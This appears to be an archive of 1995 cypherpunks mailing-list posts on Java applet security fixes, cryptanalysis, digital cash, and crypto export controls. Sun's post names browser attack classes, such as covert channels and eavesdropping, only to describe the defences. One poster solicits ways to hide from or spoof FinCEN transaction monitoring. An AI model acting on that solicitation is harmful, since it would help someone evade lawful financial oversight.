code, and maybe at the same time ask for the email address of Dr James H.
Clark, since the Netscape postmaster doesn't seem to reply to email.

Afterall, he DOES know about this issue, doesn't he??  Dr. James H. Clark 
has been briefed, I hope ...

Let's see ... Dr. James H Clark, founder of Silicon Graphics Inc, and 
co-founder of Netscape Communications Corp. does know about this "itsy 
bitsy" "teeny-weeny" problem doesn't he??  

I mean there _will_ be questions as to what he knew and when he knew it and
what he did about it.  But that'll be his baby ... and I'll let him speak 
for himself on that one. 

But the other question ... the question of what the other co-founder of
Netscape Communications Corp., Marc Andreessen, knew is not a subject for 
speculation.  We know that.

Marc Andreessen, vice-president of technology at Netscape, and creator of 
NCSA Mosaic's knowledge is clear.  We "know" what Marc knew. 

Marc won't be able to pull an "Ollie North" and redact the public domain
electronic archives.  It's clear what he knew and when he knew it. 

A simple one line command tells all ... a command like, maybe:

           mget rfc* |grep Andreessen

run at one of the public domain archives might give us some clues and
pointers to anyone who might be familiar with how the net works.  Then a
little follow up and search of some mailing lists ... lists of the
Internet Engineering Task Force ... cross-referencing the records of the
IETF might tell us what Marc knew and when. 

NOTHING which has been written, is gone, is it Jeff??  There are no hidden
acts, and there are no solitary acts when it comes to the Network.  And 
isn't that a shame, "Jeff"??

But then what would I know about such things ... I don't *understand* the 
technology, do I "Jeff", my boy??

Simple question, once again ... does Netscape have any comment to make?  
Or does it continue to say "no comment".  

Will Dr. James H. Clark, and/or Marc Andreessen please step forward 
and address this issue at this time?  The international community is 
beginning to loose its patience.


> 	--Jeff
> 
> -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw at netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From stevenw at best.com  Tue Nov 14 03:20:18 1995
From: stevenw at best.com (Steven Weller)
Date: Tue, 14 Nov 1995 19:20:18 +0800
Subject: Java security (reposted from RISKS)
Message-ID: <v01530507accdb2e28a83@[206.86.1.35]>


------------------------------

Date: Fri, 10 Nov 1995 15:45:00 -0800
From: Marianne.Mueller at eng.sun.com (Marianne Mueller)
Subject: regarding Java security

This response was recently posted to comp.lang.java.
Marianne Mueller <mrm at eng.sun.com>, Java Products Group, Sun Microsystems, Inc.

Article 4356 of comp.lang.java:
Path: handler.Eng.Sun.COM!puffin.Eng.Sun.COM!mrm
>From: mrm at puffin.Eng.Sun.COM (Marianne Mueller)
Newsgroups: comp.lang.java
Subject: Re: PRINCETON STUDENTS FIND HOLE IN INTERNET SECURITY SOFTWARE
Date: 9 Nov 1995 00:50:27 GMT
Organization: Sun Microsystems, Inc.  Mt. View, Ca.
Keywords: alpha3 hotjava security

The paper written by the two students at Princeton describes possible
attacks on the alpha3 HotJava browser, which have all been fixed in JDK
beta.  Granted, until this week, the source code for JDK beta wasn't
available, so it's understandable that they analyzed the alpha3 source base.

We understand people need more information on the security model, and we're
taking time right now to document the security story more rigorously.  A
security FAQ, an updated whitepaper, detailed user documentation and
detailed implementor's documentation are all being worked on.

The Java security mechanisms include:

        Java language mechanisms

          * no pointers
          * private interfaces, classes and methods
          * class loader that enforces namespace divisions
          * runtime byte code verifier that enforces language
            type rules and name space divisions

        Browser mechanisms, used by JDK beta appletviewer and by
        Netscape Navigator 2.0beta

          * AppletSecurity: extends java.lang.SecurityManager; strict
            applet checks
          * AppletClassLoader: extends java.lang.ClassLoader; strict
            class loading

The goal for JDK beta is to enable browsers to run untrusted applets
in a trusted environment.  The approach is to be conservative at
first, and to add functionality when it can be added securely.

So, JDK beta applets (and Netscape 2.0beta applets) may not do the
following.

  1.  Files:

        Access Control Lists are greatly restricted in beta,
        as compared to the situation in the alpha3 HotJava browser.
        ACLs are initialized - only once - by the applet security
        manager, and are not user configurable.

        For a file not on the access control list, an applet cannot

        - check for the existence of the file
        - read the file
        - write the file
        - check the file type
        - check if the file is a directory
        - check the timestamp when the file was last modified
        - check the file's size
        - create a directory
        - rename the file
        - list the files in this file (as if it were a directory)

        Applets cannot

        - create a FileInputStream
        - create a RandomAccessFile, either for reading or writing
        - Open file descriptors

  2.  Sockets:

        Applets cannot

        - Create socket connections other than to its own host
        - Create a socket factory

  3.  Loading/linking:

        Applets cannot

        - Create class loaders
        - Access a package in the sun.* hierarchy
        - Define a new class in the java.* hierarchy
        - Link dynamic libraries using System.loadLibrary()
        - Disable or override the AppletSecurityManager

  4.  Process control:

        Applets cannot

        - Define native methods
        - Fork processes
        - Manipulate threads or thread groups outside of the
          applet's thread group
        - Exit the virtual machine (e.g., the browser or the appletviewer)

  5.  awt:

        Applets cannot

        - Create toplevel windows that don't have a warning banner

Applets can use network connections only to connect to the host they
originate from, to download files that are part of the applet's
implementation.  Those files might be java bytecode class files, or they
might be input files used by the applet (GIF, JPEG, audio, other data
files.)

Taking a look at the specific attacks mentioned in the paper -

        alpha3 HotJava                  JDK
        ----------------------          ---

1.      socket accept() and             applets cannot use
        listen() aren't protected       accept() and listen()
        adequately, allowing a
        browser to eavesdrop

2.      applets can connect to          applets cannot connect
        the SMTP (mail) port on         to the SMTP port on
        some web server and use         the computer the applet
        that as a covert channel        is visiting

3.      InetAddress.getByName()         applets cannot use
        is public and does not          InetAddress to inquire
        check the security mode         about hosts they are
        before making DNS request       not already allowed to
                                        connect to

4.      applets can use DNS to          applets may not get the
        create a covert channel         internet address of any
                                        host

5.      Access Control Lists (ACLs)     ACLs are greatly restricted
        for reading and writing         in JDK beta.
        files are not strict enough     Reading/writing files is
                                        disabled for web browsers,
                                        such as Netscape Navigator 2.0.

6.      applets can use the             System.getenv() is obsolete
        System.getenv() method          and is not part of the JDK
        to gather information about     API
        the computer that it is
        running on

7.      applets can change the          applets cannot read or alter
        property manager database       client properties

8.      applets can change the          The fields that hold the
        HTTP and FTP proxy server       HTTP and FTP proxy names are
                                        private.  The values are stored
                                        in a property manager database
                                        that an applet cannot read or
                                        write.

It's very difficult, if not impossible, for a web browser to completely
prevent denial of service attacks.  The JDK applet API doesn't claim to
prevent denial of service attacks.  A "denial of service" attack is where
someone writes an applet whose goal is to consume all available resources on
your computer, forcing you to kill the browser you're running.  For example,
someone could write an applet that creates a million pop-up windows.  The
windows don't do anything, but creating a million of them might use up all
the virtual memory on your computer and you'd have to kill the web browser
to reclaim the virtual memory.

Before people engage in too much wailing and gnashing of teeth about
how applets have been too severely restricted -

We want to enable applets to do interesting things, including making
socket connections, and reading and writing to the file system.  One
way to enable that is to used a signed class loader.  When a trusted
applet is loaded, then the applet could be granted permission to do
some of the things they are prevented from doing by default.

The goal is to ensure that untrusted applets can't steal or damage
information on a computer running a Java-enabled browser.  Later, we can
allow trusted applets to do things that untrusted applets are not allowed to
do.  Since an implementation bug in a trusted applet could open a loophole
that could be exploited by an untrusted applet, design matters.

Marianne  Java Products Group  http://java.sun.com/people/mrm/

------------------------------

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw at best.com                   |       -- Time Magazine, 3 July 1995







From JMKELSEY at delphi.com  Tue Nov 14 03:37:59 1995
From: JMKELSEY at delphi.com (JMKELSEY at delphi.com)
Date: Tue, 14 Nov 1995 19:37:59 +0800
Subject: No Subject
Message-ID: <01HXMG5BM8V699JE2Z@delphi.com>


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Fri, 10 Nov 1995 11:52:41 -0800
>From: Bill Stewart <stewarts at ix.netcom.com>
>Subject: Re: coding and nnet's

>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>cryptography, primarily because of the shape of the solution space.

>Neural nets work best for problems that have a continuity of
>solutions, some better than others. This allows a neural net to
>learn, proposing better and better solutions as it does. Breaking an
>algorithm provides for very little in the way of learning
>opportunities: You either recover the key or you don't. (At least
>this is true if the algorithm is any good.)

Has anyone tried using neural nets or similar techniques for
searching for useful nonrandom properties of the round functions of
block ciphers or hash functions?  This might be useful in trying to
prepare some new kind of attack, find a balanced binary function
that is useful in using the generalization of linear cryptanalysis
discussed by Harpes, Kramer, and Massey at Eurocrypt '95, find a
better "difference" function for use in a differential attack, etc.

>Neural nets work well
>in structured environments when there is something to learn, but not
>in the high-entropy, seemingly random world of cryptography." And he
>doesn't give any references.

Merkle's paper on Khufu and Khafre addresses this idea, I think.
Merkle comments that it's not going to be useful against a full
cipher, but that it might be useful against (say) Khufu with one or
two octets.

>#				Thanks;  Bill
># Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
># Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey at delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKhv1UHx57Ag8goBAQE5IAQAtV3GTqZO08WwHDJSI3Dj2NgIu7rQPrUH
V5vBCWTCvRsVNt07K8FbKMxPhF+QmXINPlOEMn4qZbhph0oyf/zAj3uV+6yzO3Eg
FMXrZzc1zOOdcfp9IcMvoXvd/av9zq/jH6Sn6yZB3jTO42ENeSSLNbxtaBrzgABl
zPklYWOnDrw=
=x3kP
-----END PGP SIGNATURE-----





From daw at delhi.CS.Berkeley.EDU  Tue Nov 14 04:28:26 1995
From: daw at delhi.CS.Berkeley.EDU (David A Wagner)
Date: Tue, 14 Nov 1995 20:28:26 +0800
Subject: coding and nnet's
Message-ID: <199511122205.RAA24984@bb.hks.net>


-----BEGIN PGP SIGNED MESSAGE-----

In article <199511111800.NAA23831 at jekyll.piermont.com>,
Perry E. Metzger <perry at piermont.com> wrote:
> 
> > Perhaps neural nets could be used in an unknown plain text, brute force
> > attack to automatically select possible decryptions for human examination. 
> > I don't know of any papers on the subject.
> 
> I remember seeing a good paper by our own David Wagner on how to do
> this without anything more than some ordinary statistics -- no
> complicated junk required. David, if you are reading this, could you
> comment?
> 

Check out
	http://www.cs.berkeley.edu/~daw/recog.ps
for a paper by Steve Bellovin & me on doing plaintext recognition
with ordinary statistics.

It has nothing to do with neural networks, though....
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMKZvoCoZzwIn1bdtAQHItQGA1jD4SjC1Vg1fwCO3VLJ7v+gUlUvncwhj
v2SwPURAjry2QAeWBNeL5hMJARQuQHNx
=Cepa
-----END PGP SIGNATURE-----





From an407769 at anon.penet.fi  Tue Nov 14 04:29:33 1995
From: an407769 at anon.penet.fi (jerry the golden retriever)
Date: Tue, 14 Nov 1995 20:29:33 +0800
Subject: ecash in pcweek
Message-ID: <9511122125.AA09326@anon.penet.fi>



Opinion: Digital Cash Takes Step Toward Reality

>From PC Week for November 13, 1995 by Bill Machrone

Some people are always looking for new ways to make money. Other people
are always looking for new ways to spend money. They're running headlong
into one another on the Internet. Most of the digital cash and
electronic commerce schemes out there are still in their infancy, but
many of them are predicated on making a transaction fee off the people
who want to buy things in this new, electronic medium.

Making money from people spending money is hardly a shocking
proposition. But all the approaches that call themselves any kind of
"cash" are stretching the definition. To the best of my knowledge, cash
is the thing you can spend without having it costing you a cent, so to
speak.

The only way you'll see digital cash without transaction costs is if a
powerful but paternalistic ruling body gets into the business. That
doesn't mean if Microsoft builds it into the operating system, but
rather if the government gets involved and makes some form of electronic
money transfer legal tender, and therefore immune to fiscal
encumbrances. This isn't remotely close to happening, so don't get your
hopes up.

Meanwhile, things are getting pretty interesting in the real world of
digital-cash transactions. Digicash (www.digicash.com) has partnered
with the Mark Twain Bank to offer online shoppers a debit card-like "E-
cash" account that they can fill with real money and then use either in
normal purchases or microtransactions from vendors who accept E-cash.
You pay a combination of setup fees, monthly fees, and money-movement
fees, but the overall goal is to make the transactions painless,
transparent, and anonymous. The anonymity factor is a key component of
real cash and a design requirement of Digicash. It's extremely unlikely
that anyone could spoof the system and spend your money; yet you can re-
create your E-cash on your own machine if you have a disk crash.

Portland Software (www.portsoft.com) has also attacked the issue,
putting itself in the position of vendors who want to sell things
electronically. Its approach, called ZipLock, is suited to selling
software products on the spot but is also suitable for published
content, artistic images, and fonts. It approves your credit and goes
through an unlocking/decrypting routine on the spot. The ZipLock
transaction is much more like a normal credit-card transaction and in
fact uses the communications infrastructure built by a major credit-card
clearinghouse. In effect, it transforms your PC into a point-of-sale
terminal, where all you have to do is enter your credit-card number. If
you're ordering software or other electronically deliverable goods,
they're transmitted and decrypted on the spot. Other merchandise is
delivered via the usual direct-marketing vehicles. Fees are paid by the
merchant, which means that the transaction cost is built into the price.

Although E-cash and ZipLock are hardly the only two electronic-payment
schemes out there, their differences are instructive. Each appears to
have a significant, valid role in building consumer confidence in online
commerce.

Bill Machrone is vice president of technology for Ziff-Davis Publishing
Co. He can be reached at wmachrone (MCI Mail) or 72241,15 (CompuServe).
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse at anon.penet.fi
For information (incl. non-anon reply) write to    help at anon.penet.fi
If you have any problems, address them to          admin at anon.penet.fi





From rsalz at osf.org  Tue Nov 14 04:56:22 1995
From: rsalz at osf.org (Rich Salz)
Date: Tue, 14 Nov 1995 20:56:22 +0800
Subject: Getting the ITAR
Message-ID: <9511140421.AA12502@sulphur.osf.org>


The front of the ITAR has this convenient phone number you can call
to get a copy: 1 703 875 6644.  I don't think anyone on this list can
claim ignorance. :)  BTW, as for Pegasus, please note that I didn't say
the author was going to get in trouble, merely that his software is
export controlled -- there's a difference.
	/r$





From llurch at networking.stanford.edu  Tue Nov 14 04:58:51 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Tue, 14 Nov 1995 20:58:51 +0800
Subject: Password File Utility Wanted [Win95, ha ha]
In-Reply-To: <48888p$970@news.infi.net>
Message-ID: <199511140428.UAA03630@Networking.Stanford.EDU>


(A copy of this message has also been posted to the following newsgroups:
comp.os.ms-windows.win95.misc, alt.security,comp.security.misc)

-----BEGIN PGP SIGNED MESSAGE-----

In article <48888p$970 at news.infi.net>, lestat at richmond.infi.net
(Terry Harrison) wrote:

>I would like to obtain a program to address the following.....
>
>I use the 'remember password' option on my network logins, and then
>when they expire, I don't remember what they were.  This is bad as I
>need them to change the old password (particularly a problem with
>Netware).  What I would like is a utility that would prompt me for my
>current windows ID for security, then decode the .pwl files so that I
>could read my old passwords.  Ideally, it would allow an edit of the
>existing passwords as well.  Anybody seen onea these??

Such a thing could exist, because Win95 allows you to save passwords that
use different encryption methods. Microsoft would say "no, doesn't exist,"
however, because this is a major security flaw. I haven't seen such a
tool, though. Anybody?

What you should do is get a real encryption package like PGP (poke
around on http://web.mit.edu/ or http://www.netresponse.com/zldf/, it's
free), use something that is long and complicated but that you will never
ever forget as your PGP passphrase, and encrypt a text file containing
all of your passwords with PGP. You can put other stuff like all your
credit card numbers in a PGP-encrypted file with reasonable safety too.
You (only) will be able to decrypt and read this file whenever you want.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKgam43DXUbM57SdAQE9eQP/YY/Sv9izIoSg9gnOZUM+WQSZfkv/YDi4
oCzFerVMDFZT+7kD+w206qGjrtWUDQ3Rwie5XqlaLG3Ezhh9tpldMMPdy50K8dwI
WL43SQeplXDxAESUC3Td7j2MRK5ONacfojSaSoauHW6Ffr+M2sU5opJlB+y88eTv
45VCTDn8J1I=
=Qbqx
-----END PGP SIGNATURE-----
-- 
rich graves, llurch at networking.stanford.edu
moderator of the win95netbugs list
http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html





From EALLENSMITH at ocelot.Rutgers.EDU  Tue Nov 14 06:43:47 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Tue, 14 Nov 1995 22:43:47 +0800
Subject: coding and nnet's
Message-ID: <01HXM96ZFRDC8WXWOV@mbcl.rutgers.edu>


From: tcmay at got.net 13-NOV-1995 02:25:05.47:

At 11:40 PM 11/11/95, Michael Pierson wrote:

>I wouldn't be surprised to learn of somebody like FinCEN using
>neural-net systems to do pattern analysis on funds transfers and
>the like, or the NRO or NSA investing research money into
>investigating the usefulness of NNs for image processing or for
>scanning raw ELIN SIGINT or COMINT data.  In fact, I'd be quite
>surprised if they weren't.

[...]

I recall reading of some contracts let out, and other RFCs, for AI
programs for FinCEN use. Not surprising. (If I ran FinCEN, this is
what I'd surely have a bunch of folks working on. Scary thought.)
------------------------

     I find it interesting that FinCEN has a net link (at
http://www.ustreas.gov/treasury/bureaus/fincen/fincen.html). I have
heard about an IRS cash-tracking center in Detroit, where all those
$100+ cash deposits/withdrawals get sent. They probably use similar
setups for analysis, although with more of an individual focus.
     I have recently been contemplating how a private digital cash
system (either national-currency based or private-currency based)
would show up on such an analysis process. My suspicion is that it
would do so via fewer known non-cash transfers. Cash transactions
might actually increase, due to conversions between digital cash
and normal cash. On the other hand, many of those using a private
digital cash scheme may (like myself) tend to use mostly cash
anyway.
     I am interested in hearing the thoughts of others on this
subject. Particularly useful would be methods to stealth or spoof
such a system; i.e., to either hide a private digital cash system
from it, or to give it so many false positives that they couldn't
distinguish what is real and what is not. I suggest that the latter
would be easier (and would have other valuable applications).
     -Allen

P.S. Does anyone know what is up with the extropians list? Down
again, I suspect.





From gjeffers at socketis.net  Tue Nov 14 07:28:27 1995
From: gjeffers at socketis.net (Gary Jeffers)
Date: Tue, 14 Nov 1995 23:28:27 +0800
Subject: U.S. Exit Tax - SI
Message-ID: <199511141046.EAA18231@mail.socketis.net>


                  U.S.  EXIT TAXES
from Strategic Investment's Intelligence bulletins - November 15, 1995

Strategic Investment
824 E. Baltimore St.
Baltimre, MD 21202-4799

Published monthly for U.S. residents at US$109 per year.


   Republicans add barbed wire to Clinton's "Berlin Wall." SI accurately
forecasted the coming of the "exit" tax proposed by the Clinton Admin-
istration earlier this year. Now Senate Republicans have passed an exit
tax that is even more punitive than that proposed by Clinton. Section
12441(b) of the Balanced Budget Reconciliation Act of 1995 (H.R. 2491)
adds a new layer of confiscatory taxes, succession taxes, to be imposed
upon U.S. citizens and residents. Unlike gift or estate taxes, which are
imposed upon the giver or his estate, succession taxes are imposed upon
the recipient of bequests. Under the Senate proposal, succession taxes
would be levied upon property acquired by gift or inheritance from a
former U.S. citizen or former long-term resident of the U.S. who leaves
U.S. tax jurisdiction after February, 1995. This tax would make it finan-
cially more punitive for an American to renounce his citizenship unless
his entire family came along. It would also make unattractive for foreign-
ers with close U.S. relatives to take up residence in the United States.
The would be subject ot confiscatory exit taxes upon leaving.

   (Questions arise - is there any legislation that Congress can't pass or
attempt to pass? Aren't Republicans supposted to be an alternative to
Democrates?) - GLJ







From s1113645 at tesla.cc.uottawa.ca  Tue Nov 14 09:12:41 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Wed, 15 Nov 1995 01:12:41 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <Pine.3.89.9511140929.A25609-0100000@tesla.cc.uottawa.ca>


I just found this tidbit while following Sameer's Apache WWW server link.
For those who were wondering if plug-in crypto hooks were still watched 
out for. One wonders how the ietf folks are managing to promote internet-wide
standards that are considered unexportable (Are they? What's the deal on 
photuris, PEM, ipsec and the rest of them?)

Ps. I may be totally wrong, but I remember seeing something posted last 
month about some ZKIPS scheme in relation with Netscape (zero knowledge 
proofs with web servers, huh? Confused).


-----------------------------------------------------------------------
   [IMAGE] 
   
                         WHY WE TOOK PEM OUT OF APACHE
                                       
   On May 17th, 1995, we were asked by a representative of NCSA to remove
   any copies of NCSA httpd prior to 1.4.1 from our web site. They were
   mandated by the NSA to inform us that redistribution of pre-1.4.1 code
   violated the same laws that make distributing Phill Zimmerman's PGP
   package to other countries illegal. There was no encryption in NCSA's
   httpd, only hooks to publicly available libraries of PEM code. By the
   NSA's rules, even hooks to this type of application is illegal. 
   
   Because Apache is based on NCSA code, and we had basically not touched
   that part of the software, we were informed that Apache was also
   illegal to distribute to foreign countries, and advised (not mandated)
   by NCSA to remove it. So, we removed both the copies of the NCSA httpd
   we had, and all versions of Apache previous to 0.6.5. 
   
   The Apache members are strong advocates of the right to digital
   privacy, so the decision to submit to the NSA and remove the code was
   not an easy one. Here are some elements in our rationale: 
     * The PEM code in httpd was not widely used. No major site relied
       upon its use, so its loss is not a blow to encryption and security
       on the world wide web. There are other efforts designed to give
       much more flexible security - SSL and SHTTP - so this wasn't a
       function whose absence would really be missed on a functional
       level. 
     * We didn't feel like being just a couple more martyrs in a fight
       being fought very well by many other people. Rather than have the
       machine that supports the project confiscated or relocated to
       South Africa, etc., we think there are more efficient methods to
       address the issue. 
       
   It kind of sickens us that we had to do it, but so be it. 
   
   Patches that re-implement the PEM code may be available at a foreign
   site soon. If it does show up, we'll point to it - that can't be
   illegal! 
   
   Finally, here is a compendium of pointers to sites related to
   encryption and export law. We can't promise this list will be up to
   date, so send us mail when you see a problem or want a link added.
   Thanks. 
     * Yahoo - Science: Mathematics: Security and Encryption 
     * EFF Crypto/Privacy/Security Archive 
     * Crypto page at Quadralay 
     * Cryptography Export Control Archives (Cygnus) 
     * ICLU - Your Rights in Cyberspace 
       
   Brian, brian at hyperreal.com 







From eay at mincom.oz.au  Tue Nov 14 09:15:26 1995
From: eay at mincom.oz.au (Eric Young)
Date: Wed, 15 Nov 1995 01:15:26 +0800
Subject: 4096 bit strong prime for Diffle-Hellman
In-Reply-To: <Pine.SOL.3.91.951114090156.23102A-100000@orb>
Message-ID: <Pine.SOL.3.91.951114105404.13469A-100000@orb>



On Tue, 14 Nov 1995, Eric Young wrote:
> Even if the private DH values are pre-calculated, this will only halve the
> time of the DH operation and if this is done it looses the advantage of DH
> in that if the private/public pair are 'generated on the fly',
> pre-recorded session will not be able to be decoded if the private key is

Urk, that reads very badly what I ment is that since a different
public/private key is used per session, if a private key is revealed, any
previous and future comunication between the 2 entities is not
compromised, only the particular session using that public/private key pair.
Also since the key pair is generated on the fly, they don't need to be 
recorded on disk etc, so they only way to get the private key is to 
'hack' the application at runtime (or modify it in advance).

eric (who is have a bad day converting his thoughts to english...).





From perry at piermont.com  Tue Nov 14 09:15:46 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Wed, 15 Nov 1995 01:15:46 +0800
Subject: U.S. Exit Tax - SI
In-Reply-To: <199511141046.EAA18231@mail.socketis.net>
Message-ID: <199511141326.IAA05233@jekyll.piermont.com>



This is really not cypherpunks material at all. Post this sort of
thing to "Libernet", not to cypherpunks.

.pm

Gary Jeffers writes:
>                   U.S.  EXIT TAXES
> from Strategic Investment's Intelligence bulletins - November 15, 1995
> 
>    Republicans add barbed wire to Clinton's "Berlin Wall." SI accurately
> forecasted the coming of the "exit" tax proposed by the Clinton Admin-
> istration earlier this year. Now Senate Republicans have passed an exit
> tax that is even more punitive than that proposed by Clinton. Section





From vitamin at best.com  Tue Nov 14 09:16:41 1995
From: vitamin at best.com (vitamin)
Date: Wed, 15 Nov 1995 01:16:41 +0800
Subject: unsubcribe
Message-ID: <199511141535.HAA01352@blob.best.net>



unsubcribe










From lbowen at eznet.net  Tue Nov 14 09:17:39 1995
From: lbowen at eznet.net (Lloyd Bowen)
Date: Wed, 15 Nov 1995 01:17:39 +0800
Subject: BBS Generator Code Needed
Message-ID: <199511141529.KAA04080@shell1.eznet.net>


Does anyone have 'C' code for the Blum-Blum-Shub PRN Generator handy?  I
would rather not have to write it myself if there is tested code available.
--8^}

Thanks
======================================================================
Lloyd Bowen
Paychex, Inc.
E-Mail to: lbowen at eznet.net
======================================================================






From jya at pipeline.com  Tue Nov 14 09:37:44 1995
From: jya at pipeline.com (John Young)
Date: Wed, 15 Nov 1995 01:37:44 +0800
Subject: FKI_osk
Message-ID: <199511141703.MAA01329@pipe2.nyc.pipeline.com>


   11-14-95. Washrag:


   "FBI Targets Expected Growth In Computer Crime."

      The FBI is beefing up its fight against computer crime.
      A Washington office, which handles international cases,
      was established in 1993. The San Francisco office will
      keep a close eye on activities in Silicon Valley, while
      the New York squad will handle financial-related
      computer crimes.


   "Postal Service Planning to Sell Prepaid Telephone Cards."

      Because the phone cards are "stored value cards," they
      could offer the Postal Service a logical first step
      toward the use of a "smart card" that might be used in
      connection with an information kiosk the agency is
      developing for the federal government to provide the
      public with a computer link to the federal bureaucracy.
      Long-range plans for the kiosk call for use of smart
      cards that would enable people to receive government
      payments, such as welfare benefits or checks for food
      stamps.


   FKI_osk  (7 kb)













From dmacfarlane at zip.sbi.com  Tue Nov 14 10:28:24 1995
From: dmacfarlane at zip.sbi.com (David Macfarlane)
Date: Wed, 15 Nov 1995 02:28:24 +0800
Subject: BBS Generator Code Needed
Message-ID: <9511141749.AA28423@zip_master2.sbi.com>


> Does anyone have 'C' code for the Blum-Blum-Shub PRN Generator handy?  I
> would rather not have to write it myself if there is tested code available.
> --8^}
>
> Thanks
> ======================================================================
> Lloyd Bowen
> Paychex, Inc.
> E-Mail to: lbowen at eznet.net
> ======================================================================

Wei Dai's crypto++ has BBS, if you can find a copy.

	David.





From jeffb at sware.com  Tue Nov 14 10:34:08 1995
From: jeffb at sware.com (Jeff Barber)
Date: Wed, 15 Nov 1995 02:34:08 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <Pine.3.89.9511140929.A25609-0100000@tesla.cc.uottawa.ca>
Message-ID: <199511141758.MAA14695@jafar.sware.com>


s1113645 at tesla.cc.uottawa.ca writes:

> For those who were wondering if plug-in crypto hooks were still watched 
> out for. One wonders how the ietf folks are managing to promote internet-wide
> standards that are considered unexportable (Are they? What's the deal on 
> photuris, PEM, ipsec and the rest of them?)

>                          WHY WE TOOK PEM OUT OF APACHE
>                                        
>    On May 17th, 1995, we were asked by a representative of NCSA to remove
>    any copies of NCSA httpd prior to 1.4.1 from our web site. They were
>    mandated by the NSA to inform us that redistribution of pre-1.4.1 code
>    violated the same laws that make distributing Phill Zimmerman's PGP
>    package to other countries illegal. There was no encryption in NCSA's
>    httpd, only hooks to publicly available libraries of PEM code. By the
>    NSA's rules, even hooks to this type of application is illegal. 

Does anyone know the ostensible justification for this?  What section of
the ITARs do they point to when they say "this is illegal"?  I've perused
an online copy of ITAR (no, I haven't read all of it -- I have other
things I want to do this year :-), but I can't find a section that could
be construed to support this contention.


-- Jeff





From ylo at cs.hut.fi  Wed Nov 15 03:41:48 1995
From: ylo at cs.hut.fi (Tatu Ylonen)
Date: Wed, 15 Nov 95 03:41:48 PST
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511141758.MAA14695@jafar.sware.com>
Message-ID: <199511142016.VAA00818@trance.olari.clinet.fi>


>> For those who were wondering if plug-in crypto hooks were still watched 
>> out for. One wonders how the ietf folks are managing to promote internet-wide
>> standards that are considered unexportable (Are they? What's the deal on 
>> photuris, PEM, ipsec and the rest of them?)

> Does anyone know the ostensible justification for this?  What section of
> the ITARs do they point to when they say "this is illegal"?  I've perused
> an online copy of ITAR (no, I haven't read all of it -- I have other
> things I want to do this year :-), but I can't find a section that could
> be construed to support this contention.

Luckily, a lot of cryptographic materials are available outside the
United States (see e.g. http://www.cs.hut.fi/crypto for pointers).

If the United States chooses to restrict export of IP security
products, it simply helps create a flourishing network security
and other communications industry in other countries.  There are
already several implementations of the IP security stuff abroad -
including at least one in the former Soviet Union.

    Tatu





From s1113645 at tesla.cc.uottawa.ca  Tue Nov 14 11:48:33 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Wed, 15 Nov 1995 03:48:33 +0800
Subject: BBS Generator Code Needed
In-Reply-To: <199511141529.KAA04080@shell1.eznet.net>
Message-ID: <Pine.3.89.9511141448.A37638-0100000@tesla.cc.uottawa.ca>




On Tue, 14 Nov 1995, Lloyd Bowen wrote:

> Does anyone have 'C' code for the Blum-Blum-Shub PRN Generator handy?  I
> would rather not have to write it myself if there is tested code available.
> --8^}
They have one at the big motherload at 
<ftp://ftp.dsi.unimi.it/pub/security/crypt/code> 
Wei Dai's crypt++ also has one in C++.





From rsalz at osf.org  Tue Nov 14 11:52:00 1995
From: rsalz at osf.org (Rich Salz)
Date: Wed, 15 Nov 1995 03:52:00 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
Message-ID: <9511141920.AA13573@sulphur.osf.org>


As I said in my original message about Pegasus:
	The NSA consider this kind of thing "crypto with a hole"
	It's stupid, the hole is the crypto.  But, the rest of
	the code is considered by the Agency to be an "ancilliary
	device" as defined under ITAR.





From sameer at c2.org  Tue Nov 14 11:56:52 1995
From: sameer at c2.org (sameer)
Date: Wed, 15 Nov 1995 03:56:52 +0800
Subject: c2.org now accepts ecash
Message-ID: <199511141926.LAA05987@infinity.c2.org>


	We now accept ecash: http://www.c2.org/signup.phtml

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer at c2.org





From black at sunflash.eng.usf.edu  Tue Nov 14 12:17:24 1995
From: black at sunflash.eng.usf.edu (James Black)
Date: Wed, 15 Nov 1995 04:17:24 +0800
Subject: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511141758.MAA14695@jafar.sware.com>
Message-ID: <Pine.SUN.3.91.951114144604.9607A-100000@sunflash.eng.usf.edu>


Hello,

On Tue, 14 Nov 1995, Jeff Barber wrote:

> s1113645 at tesla.cc.uottawa.ca writes:
> 
> Does anyone know the ostensible justification for this?  What section of
